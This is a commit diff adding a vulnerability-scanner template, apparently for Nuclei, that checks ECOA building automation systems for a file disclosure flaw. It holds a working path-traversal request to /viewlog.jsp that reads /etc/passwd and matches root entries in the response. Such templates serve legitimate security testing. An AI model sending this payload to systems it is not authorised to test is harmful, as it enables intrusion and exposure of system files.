commit
3deb522abc
|
@ -0,0 +1,27 @@
|
||||||
|
id: ecoa-building-automation-lfd
|
||||||
|
info:
|
||||||
|
name: ECOA Building Automation System - LFD
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
|
||||||
|
tags: ecoa,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /viewlog.jsp HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue